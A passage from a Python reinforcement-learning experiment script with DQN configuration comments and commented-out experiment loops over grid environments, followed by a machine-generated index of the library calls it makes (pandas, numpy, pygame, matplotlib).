(there are 4) Save = False # Save the model speed = 0.05 # seconds per frame # Cond_to_end = "max_steps" # Cond_to_end = "coll_all" # Cond_to_end = "only_negative" Episodes = 500 # Usually 1000 or 100 # region DQN Model Configurations: # max_memory_list = [5, 5, 5, 30, 30, 30, 100, 100, 100] # hidden_size_list = [5, 30, 270, 5, 30, 270, 5, 30, 270] # batch_size_list = [1, 1, 1, 10, 10, 10, 32, 32, 32] max_memory_list = [100, 100, 100, 300, 300, 300, 900, 900, 900] hidden_size_list = [5, 10, 15, 5, 10, 15, 5, 10, 15] batch_size_list = [32, 32, 32, 32, 32, 32, 32, 32, 32] optimizer_list = ["adam", "rms_opt"] n_actions = 4 # [move_up, move_down, move_left, move_right] # endregion Net_comb_param = 4 # ------------------------------------------------------------------------------------------- # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save) # ------------------------------------------------------------------------------------------- # ''' REPEAT DQN Net_Comb_Param ''' # for i in range(9): # Net_comb_param = i # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save) ''' REPEAT Alg for a list of Env ''' # env_list = [2,3] # for Env in env_list: # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save) ''' Alg_list for Env_list ''' # env_list = [2,3] # alg_list = ["QL", "DSRL", "DSRL_object_near", "DQN"] # for Env in env_list: # for Alg in alg_list: # run(Env, Alg, Learn, Load, Print, Auto, Episodes, Cond_to_end, Server, Net_comb_param, Load_path, Prob, Samples, Save)
[((58, 0, 58, 42), 'pandas.set_option', 'pd.set_option', ({(58, 14, 58, 35): '"""display.max_columns"""', (58, 37, 58, 41): 'None'}, {}), "('display.max_columns', None)", True, 'import pandas as pd\n'), ((59, 0, 59, 43), 'pandas.set_option', 'pd.set_option', ({(59, 14, 59, 34): '"""display.large_repr"""', (59, 36, 59, 42): '"""info"""'}, {}), "('display.large_repr', 'info')", True, 'import pandas as pd\n'), ((61, 0, 61, 45), 'pandas.set_option', 'pd.set_option', ({(61, 14, 61, 29): '"""display.width"""', (61, 31, 61, 44): 'desired_width'}, {}), "('display.width', desired_width)", True, 'import pandas as pd\n'), ((62, 0, 62, 29), 'pandas.set_option', 'pd.set_option', ({(62, 14, 62, 25): '"""precision"""', (62, 27, 62, 28): '(4)'}, {}), "('precision', 4)", True, 'import pandas as pd\n'), ((65, 0, 65, 19), 'numpy.random.seed', 'np.random.seed', ({(65, 15, 65, 18): '(123)'}, {}), '(123)', True, 'import numpy as np\n'), ((66, 0, 66, 13), 'pygame.init', 'pygame.init', ({}, {}), '()', False, 'import pygame\n'), ((67, 5, 67, 35), 'pprint.PrettyPrinter', 'pprint.PrettyPrinter', (), '', False, 'import pprint\n'), ((96, 12, 96, 50), 'pygame.font.SysFont', 'pygame.font.SysFont', ({(96, 32, 96, 45): '"""comicsansms"""', (96, 47, 96, 49): '13'}, {}), "('comicsansms', 13)", False, 'import pygame\n'), ((97, 16, 97, 48), 'pygame.font.SysFont', 'pygame.font.SysFont', ({(97, 36, 97, 43): '"""arial"""', (97, 45, 97, 47): '13'}, {}), "('arial', 13)", False, 'import pygame\n'), ((98, 17, 98, 60), 'pygame.font.SysFont', 'pygame.font.SysFont', (), '', False, 'import pygame\n'), ((99, 0, 99, 18), 'pygame.font.init', 'pygame.font.init', ({}, {}), '()', False, 'import pygame\n'), ((520, 12, 520, 50), 'Class.Agent', 'Class.Agent', ({(520, 24, 520, 31): '"""agent"""', (520, 33, 520, 40): 'x_agent', (520, 42, 520, 49): 'y_agent'}, {}), "('agent', x_agent, y_agent)", False, 'import Class\n'), ((853, 8, 853, 23), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((1070, 12, 1070, 23), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1071, 17, 1071, 39), 'time.strftime', 'time.strftime', ({(1071, 31, 1071, 38): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((1074, 15, 1074, 29), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1075, 22, 1075, 36), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1076, 19, 1076, 33), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1077, 21, 1077, 35), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((1546, 13, 1546, 24), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1547, 18, 1547, 40), 'time.strftime', 'time.strftime', ({(1547, 32, 1547, 39): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((163, 14, 163, 32), 'Class.Obj', 'Class.Obj', ({(163, 24, 163, 26): 'tp', (163, 28, 163, 31): 'loc'}, {}), '(tp, loc)', False, 'import Class\n'), ((182, 14, 182, 36), 'Class.Obj', 'Class.Obj', ({(182, 24, 182, 26): 'tp', (182, 28, 182, 35): 'loc_dif'}, {}), '(tp, loc_dif)', False, 'import Class\n'), ((224, 17, 225, 39), 'numpy.matrix', 'np.matrix', ({(224, 27, 225, 38): '[[0, 0, 0], [0, 1, 0]]'}, {}), '([[0, 0, 0], [0, 1, 0]])', True, 'import numpy as np\n'), ((226, 17, 227, 39), 'numpy.matrix', 'np.matrix', ({(226, 27, 227, 38): '[[0, 1, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((478, 17, 480, 39), 'numpy.matrix', 
'np.matrix', ({(478, 27, 480, 38): '[[0, 0, 0], [0, 1, 0], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 1, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((481, 17, 483, 39), 'numpy.matrix', 'np.matrix', ({(481, 27, 483, 38): '[[0, 1, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((552, 16, 552, 54), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((612, 16, 612, 30), 'pandas.DataFrame', 'pd.DataFrame', ({}, {}), '()', True, 'import pandas as pd\n'), ((698, 18, 698, 58), 'numpy.zeros', 'np.zeros', ({(698, 27, 698, 57): '(inputs.shape[0], num_actions)'}, {}), '((inputs.shape[0], num_actions))', True, 'import numpy as np\n'), ((770, 19, 770, 45), 'numpy.argmax', 'np.argmax', ({(770, 29, 770, 44): 'model.loc[s][0]'}, {}), '(model.loc[s][0])', True, 'import numpy as np\n'), ((856, 19, 856, 41), 'random.choice', 'random.choice', ({(856, 33, 856, 40): 'actions'}, {}), '(actions)', False, 'import random\n'), ((1062, 45, 1062, 56), 'os.getcwd', 'os.getcwd', ({}, {}), '()', False, 'import os\n'), ((1062, 58, 1062, 83), 'os.path.dirname', 'os.path.dirname', ({(1062, 74, 1062, 82): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((1080, 35, 1080, 88), 'pygame.display.set_mode', 'pygame.display.set_mode', ({(1080, 59, 1080, 87): '(400 + 37 * 5, 330 + 37 * 5)'}, {}), '((400 + 37 * 5, 330 + 37 * 5))', False, 'import pygame\n'), ((1099, 16, 1099, 27), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1100, 21, 1100, 43), 'time.strftime', 'time.strftime', ({(1100, 35, 1100, 42): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((1372, 14, 1372, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((1373, 19, 1373, 41), 'time.strftime', 'time.strftime', ({(1373, 33, 1373, 40): '"""%X %x"""'}, {}), "('%X %x')", False, 'import time\n'), ((1387, 24, 1387, 59), 'pandas.DataFrame', 'pd.DataFrame', ({(1387, 37, 1387, 58): "{'Score': score_list}"}, {}), "({'Score': score_list})", True, 'import pandas as pd\n'), ((1388, 26, 1388, 65), 'pandas.DataFrame', 'pd.DataFrame', ({(1388, 39, 1388, 64): "{'Percent': percent_list}"}, {}), "({'Percent': percent_list})", True, 'import pandas as pd\n'), ((1389, 23, 1389, 62), 'pandas.DataFrame', 'pd.DataFrame', ({(1389, 36, 1389, 61): "{'Batch_loss': loss_list}"}, {}), "({'Batch_loss': loss_list})", True, 'import pandas as pd\n'), ((1390, 25, 1390, 63), 'pandas.DataFrame', 'pd.DataFrame', ({(1390, 38, 1390, 62): "{'Time': [time_elapsed]}"}, {}), "({'Time': [time_elapsed]})", True, 'import pandas as pd\n'), ((1392, 19, 1392, 82), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1393, 26, 1393, 98), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1394, 23, 1394, 89), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1395, 25, 1395, 95), 'pandas.concat', 'pd.concat', (), '', True, 'import pandas as pd\n'), ((1431, 25, 1431, 56), 'numpy.average', 'np.average', ({(1431, 36, 1431, 55): 'avg_last_score_list'}, {}), '(avg_last_score_list)', True, 'import numpy as np\n'), ((1466, 17, 1466, 73), 'pandas.ExcelWriter', 'pd.ExcelWriter', (), '', True, 'import pandas as pd\n'), ((205, 12, 205, 36), 'numpy.zeros', 'np.zeros', ({(205, 21, 205, 35): '(v_max, h_max)'}, {}), '((v_max, h_max))', True, 'import numpy as np\n'), ((234, 17, 235, 39), 'numpy.matrix', 'np.matrix', ({(234, 27, 235, 38): '[[0, 0, 0], [0, 0, 1]]'}, {}), '([[0, 0, 0], [0, 0, 1]])', True, 'import numpy as np\n'), ((236, 
17, 237, 39), 'numpy.matrix', 'np.matrix', ({(236, 27, 237, 38): '[[0, 0, 1], [0, 0, 0]]'}, {}), '([[0, 0, 1], [0, 0, 0]])', True, 'import numpy as np\n'), ((490, 17, 492, 39), 'numpy.matrix', 'np.matrix', ({(490, 27, 492, 38): '[[0, 0, 0], [0, 0, 1], [0, 0, 0]]'}, {}), '([[0, 0, 0], [0, 0, 1], [0, 0, 0]])', True, 'import numpy as np\n'), ((493, 17, 495, 39), 'numpy.matrix', 'np.matrix', ({(493, 27, 495, 38): '[[0, 0, 1], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 0, 1], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((556, 16, 556, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((616, 18, 618, 59), 'pandas.MultiIndex', 'pd.MultiIndex', (), '', True, 'import pandas as pd\n'), ((619, 16, 619, 43), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((701, 32, 701, 86), 'numpy.random.randint', 'np.random.randint', (), '', True, 'import numpy as np\n'), ((244, 17, 245, 39), 'numpy.matrix', 'np.matrix', ({(244, 27, 245, 38): '[[1, 0, 0], [0, 0, 0]]'}, {}), '([[1, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((246, 17, 247, 39), 'numpy.matrix', 'np.matrix', ({(246, 27, 247, 38): '[[0, 1, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((502, 17, 504, 39), 'numpy.matrix', 'np.matrix', ({(502, 27, 504, 38): '[[1, 0, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[1, 0, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((505, 17, 507, 39), 'numpy.matrix', 'np.matrix', ({(505, 27, 507, 38): '[[0, 1, 0], [0, 0, 0], [0, 0, 0]]'}, {}), '([[0, 1, 0], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((517, 23, 517, 47), 'Class.Wall', 'Class.Wall', ({(517, 34, 517, 40): '"""wall"""', (517, 42, 517, 43): 'x', (517, 45, 517, 46): 'y'}, {}), "('wall', x, y)", False, 'import Class\n'), ((527, 27, 527, 67), 'Class.Positivo', 'Class.Positivo', ({(527, 42, 527, 52): '"""positivo"""', (527, 54, 527, 59): 'y + 1', (527, 61, 527, 66): 'x + 1'}, {}), "('positivo', y + 1, x + 1)", False, 'import Class\n'), ((535, 27, 535, 67), 'Class.Negativo', 'Class.Negativo', ({(535, 42, 535, 52): '"""negativo"""', (535, 54, 535, 59): 'y + 1', (535, 61, 535, 66): 'x + 1'}, {}), "('negativo', y + 1, x + 1)", False, 'import Class\n'), ((560, 16, 560, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((766, 23, 766, 45), 'numpy.array', 'np.array', ({(766, 32, 766, 44): '[s, s, s, s]'}, {}), '([s, s, s, s])', True, 'import numpy as np\n'), ((766, 47, 766, 88), 'numpy.array', 'np.array', ({(766, 56, 766, 87): "['up', 'down', 'right', 'left']"}, {}), "(['up', 'down', 'right', 'left'])", True, 'import numpy as np\n'), ((767, 35, 767, 51), 'numpy.zeros', 'np.zeros', ({(767, 44, 767, 50): '[4, 1]'}, {}), '([4, 1])', True, 'import numpy as np\n'), ((843, 23, 843, 45), 'random.choice', 'random.choice', ({(843, 37, 843, 44): 'actions'}, {}), '(actions)', False, 'import random\n'), ((849, 16, 849, 31), 'numpy.argmax', 'np.argmax', ({(849, 26, 849, 30): 'q[0]'}, {}), '(q[0])', True, 'import numpy as np\n'), ((880, 23, 880, 57), 'numpy.array', 'np.array', ({(880, 32, 880, 56): '[s_t1, s_t1, s_t1, s_t1]'}, {}), '([s_t1, s_t1, s_t1, s_t1])', True, 'import numpy as np\n'), ((880, 59, 880, 100), 'numpy.array', 'np.array', ({(880, 68, 880, 99): "['up', 'down', 'right', 'left']"}, {}), "(['up', 'down', 'right', 'left'])", True, 'import numpy as np\n'), ((881, 35, 881, 51), 'numpy.zeros', 'np.zeros', ({(881, 44, 881, 50): '[4, 1]'}, {}), '([4, 1])', True, 'import numpy as np\n'), ((884, 23, 884, 53), 
'numpy.array', 'np.array', ({(884, 32, 884, 52): '[s_t, s_t, s_t, s_t]'}, {}), '([s_t, s_t, s_t, s_t])', True, 'import numpy as np\n'), ((884, 55, 884, 96), 'numpy.array', 'np.array', ({(884, 64, 884, 95): "['up', 'down', 'right', 'left']"}, {}), "(['up', 'down', 'right', 'left'])", True, 'import numpy as np\n'), ((885, 35, 885, 51), 'numpy.zeros', 'np.zeros', ({(885, 44, 885, 50): '[4, 1]'}, {}), '([4, 1])', True, 'import numpy as np\n'), ((1157, 16, 1157, 37), 'pygame.display.flip', 'pygame.display.flip', ({}, {}), '()', False, 'import pygame\n'), ((1162, 16, 1162, 28), 'time.sleep', 'sleep', ({(1162, 22, 1162, 27): 'speed'}, {}), '(speed)', False, 'from time import sleep\n'), ((1417, 30, 1417, 56), 'os.path.dirname', 'os.path.dirname', ({(1417, 46, 1417, 55): 'save_path'}, {}), '(save_path)', False, 'import os\n'), ((1432, 33, 1432, 61), 'pandas.Series', 'pd.Series', ({(1432, 43, 1432, 60): "{'Run_Conf': 'A'}"}, {}), "({'Run_Conf': 'A'})", True, 'import pandas as pd\n'), ((1433, 33, 1433, 63), 'pandas.Series', 'pd.Series', ({(1433, 43, 1433, 62): "{'Env_conf': s_env}"}, {}), "({'Env_conf': s_env})", True, 'import pandas as pd\n'), ((1434, 33, 1434, 61), 'pandas.Series', 'pd.Series', ({(1434, 43, 1434, 60): "{'Algort': s_alg}"}, {}), "({'Algort': s_alg})", True, 'import pandas as pd\n'), ((1435, 33, 1435, 62), 'pandas.Series', 'pd.Series', ({(1435, 43, 1435, 61): "{'Learn': s_learn}"}, {}), "({'Learn': s_learn})", True, 'import pandas as pd\n'), ((1436, 33, 1436, 60), 'pandas.Series', 'pd.Series', ({(1436, 43, 1436, 59): "{'Load': s_load}"}, {}), "({'Load': s_load})", True, 'import pandas as pd\n'), ((1437, 33, 1437, 65), 'pandas.Series', 'pd.Series', ({(1437, 43, 1437, 64): "{'Samples': s_sample}"}, {}), "({'Samples': s_sample})", True, 'import pandas as pd\n'), ((1438, 33, 1438, 66), 'pandas.Series', 'pd.Series', ({(1438, 43, 1438, 65): "{'Episode': s_episode}"}, {}), "({'Episode': s_episode})", True, 'import pandas as pd\n'), ((1439, 33, 1439, 68), 'pandas.Series', 'pd.Series', ({(1439, 43, 1439, 67): "{'Max_steps': max_steps}"}, {}), "({'Max_steps': max_steps})", True, 'import pandas as pd\n'), ((1440, 33, 1440, 76), 'pandas.Series', 'pd.Series', ({(1440, 43, 1440, 75): "{'s_cond_to_end': s_cond_to_end}"}, {}), "({'s_cond_to_end': s_cond_to_end})", True, 'import pandas as pd\n'), ((1441, 33, 1441, 60), 'pandas.Series', 'pd.Series', ({(1441, 43, 1441, 59): "{'Auto': s_auto}"}, {}), "({'Auto': s_auto})", True, 'import pandas as pd\n'), ((1442, 33, 1442, 64), 'pandas.Series', 'pd.Series', ({(1442, 43, 1442, 63): "{'Server': s_server}"}, {}), "({'Server': s_server})", True, 'import pandas as pd\n'), ((1443, 33, 1443, 62), 'pandas.Series', 'pd.Series', ({(1443, 43, 1443, 61): "{'Print': s_print}"}, {}), "({'Print': s_print})", True, 'import pandas as pd\n'), ((1444, 33, 1444, 62), 'pandas.Series', 'pd.Series', ({(1444, 43, 1444, 61): "{'MODEL CONF': ''}"}, {}), "({'MODEL CONF': ''})", True, 'import pandas as pd\n'), ((1445, 33, 1445, 58), 'pandas.Series', 'pd.Series', ({(1445, 43, 1445, 57): "{'alfa': alfa}"}, {}), "({'alfa': alfa})", True, 'import pandas as pd\n'), ((1446, 33, 1446, 60), 'pandas.Series', 'pd.Series', ({(1446, 43, 1446, 59): "{'gamma': gamma}"}, {}), "({'gamma': gamma})", True, 'import pandas as pd\n'), ((1447, 33, 1447, 58), 'pandas.Series', 'pd.Series', ({(1447, 43, 1447, 57): "{'Prob': Prob}"}, {}), "({'Prob': Prob})", True, 'import pandas as pd\n'), ((1448, 33, 1448, 80), 'pandas.Series', 'pd.Series', ({(1448, 43, 1448, 79): "{'N_actions': net_conf['N_actions']}"}, 
{}), "({'N_actions': net_conf['N_actions']})", True, 'import pandas as pd\n'), ((1449, 33, 1449, 82), 'pandas.Series', 'pd.Series', ({(1449, 43, 1449, 81): "{'Max_memory': net_conf['Max_memory']}"}, {}), "({'Max_memory': net_conf['Max_memory']})", True, 'import pandas as pd\n'), ((1450, 33, 1450, 84), 'pandas.Series', 'pd.Series', ({(1450, 43, 1450, 83): "{'Hidden_size': net_conf['Hidden_size']}"}, {}), "({'Hidden_size': net_conf['Hidden_size']})", True, 'import pandas as pd\n'), ((1451, 33, 1451, 82), 'pandas.Series', 'pd.Series', ({(1451, 43, 1451, 81): "{'Batch_size': net_conf['Batch_size']}"}, {}), "({'Batch_size': net_conf['Batch_size']})", True, 'import pandas as pd\n'), ((1452, 33, 1452, 80), 'pandas.Series', 'pd.Series', ({(1452, 43, 1452, 79): "{'Optimizer': net_conf['Optimizer']}"}, {}), "({'Optimizer': net_conf['Optimizer']})", True, 'import pandas as pd\n'), ((1453, 33, 1453, 62), 'pandas.Series', 'pd.Series', ({(1453, 43, 1453, 61): "{'lr': op_conf[0]}"}, {}), "({'lr': op_conf[0]})", True, 'import pandas as pd\n'), ((1454, 33, 1454, 66), 'pandas.Series', 'pd.Series', ({(1454, 43, 1454, 65): "{'beta_1': op_conf[1]}"}, {}), "({'beta_1': op_conf[1]})", True, 'import pandas as pd\n'), ((1455, 33, 1455, 66), 'pandas.Series', 'pd.Series', ({(1455, 43, 1455, 65): "{'beta_2': op_conf[2]}"}, {}), "({'beta_2': op_conf[2]})", True, 'import pandas as pd\n'), ((1456, 33, 1456, 67), 'pandas.Series', 'pd.Series', ({(1456, 43, 1456, 66): "{'epsilon': op_conf[3]}"}, {}), "({'epsilon': op_conf[3]})", True, 'import pandas as pd\n'), ((1457, 33, 1457, 65), 'pandas.Series', 'pd.Series', ({(1457, 43, 1457, 64): "{'decay': op_conf[4]}"}, {}), "({'decay': op_conf[4]})", True, 'import pandas as pd\n'), ((1458, 33, 1458, 63), 'pandas.Series', 'pd.Series', ({(1458, 43, 1458, 62): "{'rho': op_conf[5]}"}, {}), "({'rho': op_conf[5]})", True, 'import pandas as pd\n'), ((1459, 33, 1459, 52), 'pandas.Series', 'pd.Series', ({(1459, 43, 1459, 51): "{'': ''}"}, {}), "({'': ''})", True, 'import pandas as pd\n'), ((1460, 33, 1460, 73), 'pandas.Series', 'pd.Series', ({(1460, 43, 1460, 72): "{'AVG SCORE': avg_last_score}"}, {}), "({'AVG SCORE': avg_last_score})", True, 'import pandas as pd\n'), ((254, 17, 255, 36), 'numpy.matrix', 'np.matrix', ({(254, 27, 255, 35): '[[0, 0], [0, 0]]'}, {}), '([[0, 0], [0, 0]])', True, 'import numpy as np\n'), ((256, 17, 257, 36), 'numpy.matrix', 'np.matrix', ({(256, 27, 257, 35): '[[0, 0], [0, 1]]'}, {}), '([[0, 0], [0, 1]])', True, 'import numpy as np\n'), ((564, 16, 564, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((788, 26, 790, 67), 'pandas.MultiIndex', 'pd.MultiIndex', (), '', True, 'import pandas as pd\n'), ((791, 26, 791, 53), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((799, 27, 799, 69), 'numpy.sqrt', 'np.sqrt', ({(799, 35, 799, 68): 's_n_c_abs[0] ** 2 + s_n_c_abs[1] ** 2'}, {}), '(s_n_c_abs[0] ** 2 + s_n_c_abs[1] ** 2)', True, 'import numpy as np\n'), ((921, 26, 923, 67), 'pandas.MultiIndex', 'pd.MultiIndex', (), '', True, 'import pandas as pd\n'), ((924, 26, 924, 53), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((1167, 33, 1167, 51), 'pygame.event.get', 'pygame.event.get', ({}, {}), '()', False, 'import pygame\n'), ((1359, 20, 1359, 41), 'pygame.display.flip', 'pygame.display.flip', ({}, {}), '()', False, 'import pygame\n'), ((1419, 28, 1419, 54), 'os.path.dirname', 'os.path.dirname', ({(1419, 44, 1419, 53): 'save_path'}, {}), '(save_path)', False, 'import os\n'), 
((264, 17, 264, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((265, 17, 265, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((568, 16, 568, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1299, 35, 1299, 89), 'Class.Positivo', 'Class.Positivo', ({(1299, 50, 1299, 60): '"""positivo"""', (1299, 62, 1299, 74): 'agent.pos[0]', (1299, 76, 1299, 88): 'agent.pos[1]'}, {}), "('positivo', agent.pos[0], agent.pos[1])", False, 'import Class\n'), ((1307, 35, 1307, 89), 'Class.Negativo', 'Class.Negativo', ({(1307, 50, 1307, 60): '"""negativo"""', (1307, 62, 1307, 74): 'agent.pos[0]', (1307, 76, 1307, 88): 'agent.pos[1]'}, {}), "('negativo', agent.pos[0], agent.pos[1])", False, 'import Class\n'), ((267, 16, 267, 46), 'random.randrange', 'random.randrange', ({(267, 33, 267, 34): '0', (267, 36, 267, 45): 'h_max - 2'}, {}), '(0, h_max - 2)', False, 'import random\n'), ((268, 16, 268, 46), 'random.randrange', 'random.randrange', ({(268, 33, 268, 34): '0', (268, 36, 268, 45): 'v_max - 2'}, {}), '(0, v_max - 2)', False, 'import random\n'), ((279, 17, 279, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((280, 17, 280, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((572, 16, 572, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1170, 28, 1170, 41), 'pygame.quit', 'pygame.quit', ({}, {}), '()', False, 'import pygame\n'), ((1171, 28, 1171, 38), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((282, 16, 282, 46), 'random.randrange', 'random.randrange', ({(282, 33, 282, 34): '0', (282, 36, 282, 45): 'h_max - 2'}, {}), '(0, h_max - 2)', False, 'import random\n'), ((283, 16, 283, 46), 'random.randrange', 'random.randrange', ({(283, 33, 283, 34): '0', (283, 36, 283, 45): 'v_max - 2'}, {}), '(0, v_max - 2)', False, 'import random\n'), ((294, 17, 294, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((295, 17, 295, 55), 'numpy.zeros', 'np.zeros', (), '', True, 'import numpy as np\n'), ((576, 16, 576, 83), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1208, 32, 1208, 45), 'pygame.quit', 'pygame.quit', ({}, {}), '()', False, 'import pygame\n'), ((1209, 32, 1209, 42), 'sys.exit', 'sys.exit', ({}, {}), '()', False, 'import sys\n'), ((1212, 32, 1212, 52), 'matplotlib.pyplot.plot', 'plt.plot', ({(1212, 41, 1212, 51): 'score_list'}, {}), '(score_list)', True, 'import matplotlib.pyplot as plt\n'), ((1213, 32, 1213, 51), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(1213, 43, 1213, 50): '"""Score"""'}, {}), "('Score')", True, 'import matplotlib.pyplot as plt\n'), ((1214, 32, 1214, 57), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(1214, 43, 1214, 56): '"""Total Steps"""'}, {}), "('Total Steps')", True, 'import matplotlib.pyplot as plt\n'), ((1215, 32, 1215, 69), 'matplotlib.pyplot.title', 'plt.title', ({(1215, 42, 1215, 68): '"""Performance of the Agent"""'}, {}), "('Performance of the Agent')", True, 'import matplotlib.pyplot as plt\n'), ((1216, 32, 1216, 42), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((1218, 32, 1218, 54), 'matplotlib.pyplot.plot', 'plt.plot', ({(1218, 41, 1218, 53): 'percent_list'}, {}), '(percent_list)', True, 'import matplotlib.pyplot as plt\n'), ((1219, 32, 1219, 69), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(1219, 43, 1219, 68): '"""Percentage of objects +"""'}, {}), "('Percentage of objects +')", True, 
'import matplotlib.pyplot as plt\n'), ((1220, 32, 1220, 57), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(1220, 43, 1220, 56): '"""Total Steps"""'}, {}), "('Total Steps')", True, 'import matplotlib.pyplot as plt\n'), ((1221, 32, 1221, 77), 'matplotlib.pyplot.title', 'plt.title', ({(1221, 42, 1221, 76): '"""Episode over 100 times step each"""'}, {}), "('Episode over 100 times step each')", True, 'import matplotlib.pyplot as plt\n'), ((1222, 32, 1222, 42), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((297, 16, 297, 46), 'random.randrange', 'random.randrange', ({(297, 33, 297, 34): '0', (297, 36, 297, 45): 'h_max - 2'}, {}), '(0, h_max - 2)', False, 'import random\n'), ((298, 16, 298, 46), 'random.randrange', 'random.randrange', ({(298, 33, 298, 34): '0', (298, 36, 298, 45): 'v_max - 2'}, {}), '(0, v_max - 2)', False, 'import random\n'), ((309, 17, 311, 39), 'numpy.matrix', 'np.matrix', ({(309, 27, 311, 38): '[[0, 0, 0], [0, 0, 0], [1, 0, 1]]'}, {}), '([[0, 0, 0], [0, 0, 0], [1, 0, 1]])', True, 'import numpy as np\n'), ((312, 17, 314, 39), 'numpy.matrix', 'np.matrix', ({(312, 27, 314, 38): '[[1, 0, 1], [0, 0, 0], [0, 0, 0]]'}, {}), '([[1, 0, 1], [0, 0, 0], [0, 0, 0]])', True, 'import numpy as np\n'), ((580, 16, 580, 84), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((1224, 36, 1224, 55), 'matplotlib.pyplot.plot', 'plt.plot', ({(1224, 45, 1224, 54): 'loss_list'}, {}), '(loss_list)', True, 'import matplotlib.pyplot as plt\n'), ((1225, 36, 1225, 54), 'matplotlib.pyplot.ylabel', 'plt.ylabel', ({(1225, 47, 1225, 53): '"""loss"""'}, {}), "('loss')", True, 'import matplotlib.pyplot as plt\n'), ((1226, 36, 1226, 61), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(1226, 47, 1226, 60): '"""Total Steps"""'}, {}), "('Total Steps')", True, 'import matplotlib.pyplot as plt\n'), ((1227, 36, 1227, 59), 'matplotlib.pyplot.title', 'plt.title', ({(1227, 46, 1227, 58): '"""batch_loss"""'}, {}), "('batch_loss')", True, 'import matplotlib.pyplot as plt\n'), ((1228, 36, 1228, 46), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((321, 17, 323, 39), 'numpy.matrix', 'np.matrix', ({(321, 27, 323, 38): '[[1, 0, 0], [0, 0, 0], [0, 0, 1]]'}, {}), '([[1, 0, 0], [0, 0, 0], [0, 0, 1]])', True, 'import numpy as np\n'), ((324, 17, 326, 39), 'numpy.matrix', 'np.matrix', ({(324, 27, 326, 38): '[[0, 0, 1], [0, 0, 0], [1, 0, 0]]'}, {}), '([[0, 0, 1], [0, 0, 0], [1, 0, 0]])', True, 'import numpy as np\n'), ((586, 15, 586, 78), 'pandas.read_excel', 'pd.read_excel', (), '', True, 'import pandas as pd\n'), ((333, 17, 339, 51), 'numpy.matrix', 'np.matrix', ({(333, 27, 339, 50): '[[1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0,\n 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1,\n 